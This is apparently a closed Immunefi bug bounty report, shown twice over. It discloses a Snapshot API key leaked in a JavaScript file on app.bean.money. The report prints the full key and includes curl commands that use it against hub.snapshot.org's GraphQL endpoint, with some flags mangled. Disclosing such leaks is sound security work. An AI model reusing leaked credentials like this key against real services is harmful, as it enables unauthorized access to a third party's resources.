Report #30684

Report Date

May 4, 2024

Status

Closed

Payout

An API key is being leaked through a JavaScript file hosted on app.bean.money, allowing unauthorized access to company resources via the Snapshot API documentation.

‣

Report Info

Report ID

#30684

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

UNAUTHORIZED USE OF APIKEY

Description

Bug Bounty Report

Report Title: API Key Leakage on app.bean.money

Summary:

An API key is being leaked through a JavaScript file hosted on app.bean.money, allowing unauthorized access to company resources via the Snapshot API documentation. JS FILE = https://app.bean.money/assets/index-CuZKWR4O.js

Severity: High

Reproduction Steps:

go to https://app.bean.money/assets/index-CuZKWR4O.js
search for ,VITE_SNAPSHOT_API_KEY:"83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59"
i have created some curl request for this

curl 'https://hub.snapshot.org/graphql?apiKey=83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'

H 'content-type: application/json'
-data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
-compressed
*2.

curl 'https://hub.snapshot.org/graphql?'

H 'content-type: application/json'
H 'x-api-key: 83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'
-data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
-compressed

these are the curl request

Impact: The exposure of the API key poses a significant security risk, allowing attackers to potentially access sensitive company data and resources through the Snapshot API.

Affected Endpoint:

GraphQL endpoint: [https://hub.snapshot.org/graphql](https://hub.snapshot.org/graphql)

Recommendation:

Immediately revoke the leaked API key and generate a new one to prevent further unauthorized access.
Conduct a thorough security audit to identify any additional vulnerabilities or exposures.
Implement stricter access controls and monitoring mechanisms to prevent similar incidents in the future.

Proof of concept

curl 'https://hub.snapshot.org/graphql?apiKey=83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'

H 'content-type: application/json'
-data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
-compressed
*2.

curl 'https://hub.snapshot.org/graphql?'

H 'content-type: application/json'
H 'x-api-key: 83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'
-data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
-compressed

Immunefi Response

Immunefi has reviewed this vulnerability report and decided to close since being out of scope for Beanstalk bug bounty program.
claimed impact by the whitehat is not in scope for the bug bounty program
claimed asset by the whitehat is in scope for the bug bounty program
PoC has been submitted to the project
claimed severity is in scope for the bug bounty program
The project will now be automatically subscribed and receive a report of the closed submission and can evaluate if they are interested in re-opening it. However, note that they are not under any obligation to do so.

An API key is being leaked through a JavaScript file hosted on app.bean.money, allowing unauthorized access to company resources via the Snapshot API documentation.

‣

Report Info

Report ID

#30684

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

UNAUTHORIZED USE OF APIKEY

Description

Bug Bounty Report

Report Title: API Key Leakage on app.bean.money

Summary:

Severity: High

Reproduction Steps:

go to https://app.bean.money/assets/index-CuZKWR4O.js
search for ,VITE_SNAPSHOT_API_KEY:"83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59"
i have created some curl request for this

curl 'https://hub.snapshot.org/graphql?apiKey=83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'

H 'content-type: application/json'
-data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
-compressed
*2.

curl 'https://hub.snapshot.org/graphql?'

H 'content-type: application/json'
H 'x-api-key: 83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'
-data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
-compressed

these are the curl request

Impact: The exposure of the API key poses a significant security risk, allowing attackers to potentially access sensitive company data and resources through the Snapshot API.

Affected Endpoint:

GraphQL endpoint: [https://hub.snapshot.org/graphql](https://hub.snapshot.org/graphql)

Recommendation:

Immediately revoke the leaked API key and generate a new one to prevent further unauthorized access.
Conduct a thorough security audit to identify any additional vulnerabilities or exposures.
Implement stricter access controls and monitoring mechanisms to prevent similar incidents in the future.

Proof of concept

curl 'https://hub.snapshot.org/graphql?apiKey=83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'

H 'content-type: application/json'
-data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
-compressed
*2.

curl 'https://hub.snapshot.org/graphql?'

H 'content-type: application/json'
H 'x-api-key: 83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59'
-data-raw '{"query":"\n{\n space(id:"snapshot.dcl.eth"){\n id\n name\n members\n}\n}","variables":null}'
-compressed

Immunefi Response

Immunefi has reviewed this vulnerability report and decided to close since being out of scope for Beanstalk bug bounty program.

claimed impact by the whitehat is not in scope for the bug bounty program
claimed asset by the whitehat is in scope for the bug bounty program
PoC has been submitted to the project
claimed severity is in scope for the bug bounty program

The project will now be automatically subscribed and receive a report of the closed submission and can evaluate if they are interested in re-opening it. However, note that they are not under any obligation to do so.